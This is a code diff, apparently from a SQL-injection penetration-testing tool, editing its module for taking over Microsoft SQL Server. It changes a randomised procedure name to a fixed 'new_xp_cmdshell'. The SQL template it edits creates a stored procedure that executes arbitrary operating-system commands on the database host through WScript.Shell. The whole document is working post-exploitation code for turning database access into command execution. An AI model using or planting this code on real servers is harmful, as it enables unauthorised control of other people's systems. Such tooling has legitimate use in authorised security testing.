diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index 706863ca0..5ab26f6a2 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -52,10 +52,9 @@ class Xp_cmdshell: inject.goStacked(agent.runAsDBMSUser(cmd)) self._randStr = randomStr(lowercase=True) - self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True) - self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew + self.xpCmdshellStr = "master..new_xp_cmdshell" - cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr, XP_CMDSHELL_NEW=self._xpCmdshellNew) + cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr) if Backend.isVersionWithin(("2005", "2008")): cmd += ";RECONFIGURE WITH OVERRIDE" diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py index f62e17ebf..cc2b38599 100644 --- a/plugins/generic/misc.py +++ b/plugins/generic/misc.py @@ -162,7 +162,7 @@ class Miscellaneous: inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True) if Backend.isDbms(DBMS.MSSQL): - return + udfDict = {"master..new_xp_cmdshell": None} if udfDict is None: udfDict = self.sysUdfs diff --git a/procs/mssqlserver/create_new_xp_cmdshell.sql b/procs/mssqlserver/create_new_xp_cmdshell.sql index 913f368c1..005730860 100644 --- a/procs/mssqlserver/create_new_xp_cmdshell.sql +++ b/procs/mssqlserver/create_new_xp_cmdshell.sql @@ -1,3 +1,3 @@ DECLARE @%RANDSTR% nvarchar(999); -set @%RANDSTR%='CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID'; +set @%RANDSTR%='CREATE PROCEDURE new_xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID'; EXEC master..sp_executesql @%RANDSTR%